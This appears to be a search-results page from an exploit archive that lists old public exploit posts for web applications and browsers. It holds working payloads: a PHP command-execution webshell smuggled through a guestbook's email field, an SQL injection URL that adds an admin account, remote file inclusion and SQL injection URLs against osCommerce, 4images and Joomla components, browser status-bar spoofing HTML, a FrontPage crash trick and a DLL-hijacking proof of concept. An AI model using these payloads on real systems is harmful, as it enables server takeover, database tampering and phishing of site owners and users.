yahoo
Search result for 'yahoo'
(0.00957202911377 seconds)
Dj7xpl/HIOX GUEST BOOK (HGB) 4.0 Remote Code Execution Vulnerability ( php)
+========================I=R=A=N============================+
HGB Version 4.0
=========================I=R=A=N=============================
+========================I=R=A=N============================+
Author :
Dj7xpl / Dj7xpl[at]Yahoo[dot]com
=========================I=R=A=N=============================
+========================I=R=A=N============================+
Type :
Remote Code Execution Vulnerability
=========================I=R=A=N=============================
+========================I=R=A=N============================+
Product / Vendor :
HIOX FREE Guest Book
http://www.hscripts.com/scripts/php/guestbook.php
=========================I=R=A=N=============================
+========================I=R=A=N============================+
Bug :
[1] Open Target By Browser
[2] Insert Bad Code In Email E.g : <?php passthru($_GET[cmd]);?>@yahoo.com
[3] See Bad C0de : http://[Targe]/[Path]/gb.php E.g : http://dj7xpl.ir/hgb/gb.php?cmd=dir
=========================I=R=A=N=============================
#Iran_e Sarbolande Man Sarboland Mimanad
#Sp Tnx : str0ke
# milw0rm.com [2007-04-10]
Kacper/proManager <= 0.73 (note.php) Remote SQL Injection Vulnerability ( php)
/* +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ + - - - [DEVIL TEAM THE BEST POLISH TEAM] - - + +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ + - proManager <= 0.73 (Add Admin) SQL Injection Vulnerabilities + +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ + - [Script name: proManager v.0.73 - [Script site: http://sourceforge.net/projects/promanager/ + +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ + - Find by: Kacper (a.k.a Rahim) + - Contact: kacper1964@yahoo.pl - or - http://www.rahim.webd.pl/ + +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ + - Special Greetz: DragonHeart ;-) - Ema: Leito, Adam, DeathSpeed, Drzewko, pepi, nukedclx - !@ Przyjazni nie da sie zamienic na marne korzysci @! + +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ + - Z Dedykacja dla osoby, - bez ktorej nie mogl bym zyc... - K.C:* J.M (a.k.a Magaja) + +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ */ #Exploit: http://www.site.com/[proManager_path]/note.php?note_id=-1%20INSERT%20INTO%20users%20(id.username.password.name.email.can_add_user)%20values%20(1.Kacper.devilteam.Kacper.kacper1964@yahoo.pl.1)/* Admin name: Kacper Password: devilteam # milw0rm.com [2006-08-26]
599eme Man/Opera 10.10 Status Bar Obfuscation ( multiple)
<!--
Opera 10.10 Status Bar Obfuscation
Author : 599eme Man
Contact : flouf@live.fr
-->
<center><h1>Opera 10.10 Status Bar Obfuscation</h1>
<br>
<strong>Author : 599eme Man.<br >
Contact : flouf@live.fr</strong><br >
_______________________________________________________________________
<br>
<br>
<br>
Click on google (look the Status bar) and you'll be redirect on Yahoo<br><strong><h1><a onclick="javascript:OB();" href="http://www.Google.com">http://www.Google.com</a></h1></strong></center>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<font style="font-family:arial;font-size:32px">Look Here<br>
| <br>
V
<script>
function OB() {
document.write('');
document.location='http://yahoo.com';
}
</script>
599eme Man/Google Chrome 3.0195.38 Status Bar Obfuscation ( windows)
<!--
Google Chrome 3.0195.38 Status Bar Obfuscation
Author : 599eme Man
Contact : flouf@live.fr
-->
<center><h1>Google Chrome 3.0195.38 Status Bar Obfuscation</h1>
<br>
<strong>Author : 599eme Man.<br >
Contact : flouf@live.fr</strong><br >
_______________________________________________________________________
<br>
<br>
<br>
Click 1?) and the 2?) (look the Status bar for the 2?)) and you'll be redirect on Yahoo<br><strong><h1><a href="javascript:window.open(self.location);">1?) Open a new Window</a><br ><a href="http://google.com" onclick="javascript:OB();">2?) http://www.Google.com</a></h1></strong></center>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<font style="font-family:arial;font-size:32px">Look Here<br>
| <br>
V
<script>
function OB() {
document.write('');
window.close();
window.open('http://yahoo.com');
}
</script>
LoSt.HaCkEr/osCommerce Online Merchant Remote File Inclusion ( na)
# Exploit Title: [oscommerce-3.0a5 Remote File Inclusion ] # Date: [26-8-2010] # Author: LoSt.HaCkEr / aDaM_TRoJaN # Software Link: [http://www.oscommerce.com/solutions/downloads] # Version: [v 3.0 ] # Tested on: [Windows XP] # CVE : #Contact: LoSt.HaCkEr[at]yahoo[dot]com /0r/ aDaM_TRoJaN@yahoo.com +++++++++++++++++++++++++++++++++++++++++++++++++++++ Exploit: http://target/oscommerce-3.0a5/oscommerce-3.0a5/oscommerce/includes/classes/actions.php?module=[SHeLL] +++++++++++++++++++++++++++++++++++++++++++++++++++++ A special tribute to: DannY.iRaQi - TeaM iRaQ HaCkers
osCommerce Online Merchant version 3.0 suffers from a remote file inclusion vulnerability.
LoSt.HaCkEr/4images 1.7.8 Remote File Inclusion ( na)
# Exploit Title: [4images1.7.8 Remote File Include ] # Date: [23-8-2010] # Author: LoSt.HaCkEr / aDaM_TRoJaN # Software Link: [http://www.4homepages.de/4images/download.php] # Version: [v 1.7.8 ] # Tested on: [Windows XP] # CVE : #Contact: LoSt.HaCkEr[at]yahoo[dot]com /0r/ aDaM_TRoJaN@yahoo.com +++++++++++++++++++++++++++++++++++++++++++++++++++++ Exploit: http://target/4images1.7.8/4images/global.php?db_servertype=[SHeLL] +++++++++++++++++++++++++++++++++++++++++++++++++++++ A special tribute to: DannY.iRaQi - TeaM iRaQ HaCkers
4images version 1.7.8 suffers from a remote file inclusion vulnerability.
L0rd CrusAd3r/Joomla JBounceback SQL Injection ( na)
Author: L0rd CrusAd3r aka VSN [crusader_hmg@yahoo.com]
Exploit Title:Joomla com_jbounceback SQL Injection Vulnerability
Vendor url:http://ijoobi.com
Published: 2010-06-10
Greetz to:Sid3^effects, MaYur, M4n0j, Dark Blue®, S1ayer,d3c0d3r,KD and to all ICW members
###############################################################################################################################################################################################
Joomla com_jbounceback SQL Injection Vulnerability
Author: L0rd CrusAd3r aka VSN [crusader_hmg@yahoo.com]
#####################################################################################################################################################################################################
Description:
Joomla com_jbounceback from ijoobi suffers from sql injection vulnerability .
#######################################################################################################################################################################################################
Vulnerability:
*SQLi Vulnerability
DEMO URL :http://demo.ijoobi.com/index.php?option=com_jbounceback&Itemid=[sqli]
-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
# 0day n0 m0re #
-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
##########################################################################################################################################################################################
The Joomla JBounceback component suffers from a remote SQL injection vulnerability.
L0rd CrusAd3r/Joomla Jiptracker SQL Injection ( na)
Author: L0rd CrusAd3r aka VSN [crusader_hmg@yahoo.com]
Exploit Title:Joomla com_jiptracker SQL Injection Vulnerability
Vendor url:http://ijoobi.com
Published: 2010-06-10
Greetz to:Sid3^effects, MaYur, M4n0j, Dark Blue®, S1ayer,d3c0d3r,KD and to all ICW members
###############################################################################################################################################################################################
Joomla com_jiptracker SQL Injection Vulnerability
Author: L0rd CrusAd3r aka VSN [crusader_hmg@yahoo.com]
#####################################################################################################################################################################################################
Description:
Joomla com_jiptracker from ijoobi suffers from sql injection vulnerability .
#######################################################################################################################################################################################################
Vulnerability:
*SQLi Vulnerability
DEMO URL :http://demo.ijoobi.com/index.php?option=com_jiptracker&Itemid=[sqli]
-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
# 0day n0 m0re #
-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
##########################################################################################################################################################################################
The Joomla Jiptracker component suffers from a remote SQL injection vulnerability.
L0rd CrusAd3r/Joomla JLinks SQL Injection ( na)
Author: L0rd CrusAd3r aka VSN [crusader_hmg@yahoo.com]
Exploit Title:Joomla com_jlinks SQL Injection Vulnerability
Vendor url:http://ijoobi.com
Published: 2010-06-10
Greetz to:Sid3^effects, MaYur, M4n0j, Dark Blue®, S1ayer,d3c0d3r,KD and to all ICW members
###############################################################################################################################################################################################
Joomla com_jlinks SQL Injection Vulnerability
Author: L0rd CrusAd3r aka VSN [crusader_hmg@yahoo.com]
#####################################################################################################################################################################################################
Description:
Joomla com_jlinks from ijoobi suffers from sql injection vulnerability .
#######################################################################################################################################################################################################
Vulnerability:
*SQLi Vulnerability
DEMO URL :http://demo.ijoobi.com/index.php?option=com_jlinks&Itemid=[sqli]
-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
# 0day n0 m0re #
-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
##########################################################################################################################################################################################
The Joomla JLinks component suffers from a remote SQL injection vulnerability.
L0rd CrusAd3r/Joomla RSGallery SQL Injection ( na)
Author: L0rd CrusAd3r aka VSN [crusader_hmg@yahoo.com]
Exploit Title:Joomla com_rsgallery SQL Injection Vulnerability
Vendor url:http://ijoobi.com
Published: 2010-06-10
Greetz to:Sid3^effects, MaYur, M4n0j, Dark Blue®, S1ayer,d3c0d3r,KD and to all ICW members
###############################################################################################################################################################################################
Joomla com_rsgallery SQL Injection Vulnerability
Author: L0rd CrusAd3r aka VSN [crusader_hmg@yahoo.com]
#####################################################################################################################################################################################################
Description:
Joomla com_jlinks from ijoobi suffers from sql injection vulnerability .
#######################################################################################################################################################################################################
Vulnerability:
*SQLi Vulnerability
DEMO URL :http://demo.ijoobi.com/index.php?option=com_rsgallery2&Itemid=[sqli]
-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
# 0day n0 m0re #
-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
##########################################################################################################################################################################################
The Joomla RSGallery component suffers from a remote SQL injection vulnerability.
L0rd CrusAd3r/Hotel / Resort Site Script SQL Injection ( na)
Author: L0rd CrusAd3r aka VSN [crusader_hmg@yahoo.com] Exploit Title:Hotel / Resort Site Script with OnLine Reservation System SQLi Vulnerable Published: 2010-06-08 Vendor url:http://www.mformula.com.br Greetz to:Sid3^effects, aa_Numb, M4n0j and to all ICW members ############################################################################################################################################################################# DESCRIPTION: Internal system for total administration of the site. Available site in the languages Portuguese, Spanish, Japanese, English, Italian, French & German. System and reservation advanced search onnline/offline, Control of orders and reservations, RSS/XML feed, Optimization in search engines, SiteMap Google, Yahoo and Bing, Support Inns, Hotel and Resorts, Unlimited Gallery of Photos, Supported to any type of personalized option (Color, Size, Type, etc), Tool of relationship between services, Tool of newsletters for customers, Personalization of the layout, colors and texts of the site in agreement your mark, Reports detailed on the site ############################################################################################################################################################################### Vulnerability: contains SQLi Vulenrable. demo URL:- http://hotel.mformula.com.br/extrapage.php?cat_id=-1'[SQLi] ################################################################################################################################################################################ -- With R3gards, L0rd CrusAd3r
Hotel / Resort Site Script with OnLine Reservation System suffers from a remote SQL injection vulnerability.
Dj7xpl/hgb-exec.txt ( na)
+========================I=R=A=N============================+
HGB Version 4.0
=========================I=R=A=N=============================
+========================I=R=A=N============================+
Author :
Dj7xpl / Dj7xpl[at]Yahoo[dot]com
=========================I=R=A=N=============================
+========================I=R=A=N============================+
Type :
Remote Code Execution Vulnerability
=========================I=R=A=N=============================
+========================I=R=A=N============================+
Product / Vendor :
HIOX FREE Guest Book
http://www.hscripts.com/scripts/php/guestbook.php
=========================I=R=A=N=============================
+========================I=R=A=N============================+
Bug :
[1] Open Target By Browser
[2] Insert Bad Code In Email E.g : <?php passthru($_GET[cmd]);?>@yahoo.com
[3] See Bad C0de : http://[Targe]/[Path]/gb.php E.g : http://dj7xpl.ir/hgb/gb.php?cmd=dir
=========================I=R=A=N=============================
#Iran_e Sarbolande Man Sarboland Mimanad
#Sp Tnx : str0ke
HIOX Guest Book (HGB) version 4.0 suffers from a remote code execution vulnerability.
Kacper/proManager073.txt ( na)
/* +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ + - - - [DEVIL TEAM THE BEST POLISH TEAM] - - + +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ + - proManager <= 0.73 (Add Admin) SQL Injection Vulnerabilities + +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ + - [Script name: proManager v.0.73 - [Script site: http://sourceforge.net/projects/promanager/ + +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ + - Find by: Kacper (a.k.a Rahim) + - Contact: kacper1964@yahoo.pl - or - http://www.rahim.webd.pl/ + +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ + - Special Greetz: DragonHeart ;-) - Ema: Leito, Adam, DeathSpeed, Drzewko, pepi, nukedclx - !@ Przyjazni nie da sie zamienic na marne korzysci @! + +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ + - Z Dedykacja dla osoby, - bez ktorej nie mogl bym zyc... - K.C:* J.M (a.k.a Magaja) + +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ */ #Exploit: http://www.site.com/[proManager_path]/note.php?note_id=-1%20INSERT%20INTO%20users%20(id.username.password.name.email.can_add_user)%20values%20(1.Kacper.devilteam.Kacper.kacper1964@yahoo.pl.1)/* Admin name: Kacper Password: devilteam
proManager versions 0.73 and below remote SQL injection exploit that makes use of note.php.
Zo0mer/frontpage.DoS.txt ( na)
Date: Sat, 17 Apr 1999 09:55:58 -0700 (PDT) From: Spb Telecom <spbtelecom@yahoo.com> To: packetstorm@genocide2600.com Subject: Front Page Server BUG discovered by Zo0mer I have discovered 1 month ago a bug in Front Page 98 Server. I enter my local host adress http://zo0mer//////////////////////////////////////////and ohhhhhhhh my server that is under WIN98 Is Crushed. I think it will be usable ??? Send Me Coments or ICQ: 8879901 Ps. If it doesnot works put more / and it crushed. ------------------------------------------------------------------------ Date: Sat, 17 Apr 1999 13:40:16 -0700 (PDT) From: Spb Telecom <spbtelecom@yahoo.com> To: Packet Storm Security <packetstorm@genocide2600.com> Subject: Re: Front Page Server BUG discovered by Zo0mer I report to Miscrosoft and they doesnot know and i ahve already watch it on bugtraq so put it on your page or i crush Front Servers
Windows FrontPage 98 Server contains another simple Denial of Service attack. Exploit description included.
ALPdaemon/Windows Internet Communication Settings DLL Hijacking Exploit (schannel.dll) ( windows)
/*
# Exploit Title: Windows Internet Communication Settings DLL Hijacking Exploit
(schannel.dll)
# Date: 25/08/2010
# Author: ALPdaemon
# Email: ALPdaemon (at) yahoo (dot) com
# Software Link: N/A
# Tested on: Windows XP SP3 English
# Extension: .isp
*/
#include <windows.h>
int alpdaemon()
{
WinExec("calc", SW_SHOW);
exit(0);
return 0;
}
BOOL WINAPI DllMain(HINSTANCE hinstDLL,DWORD fdwReason, LPVOID lpvReserved)
{
alpdaemon();
return 0;
}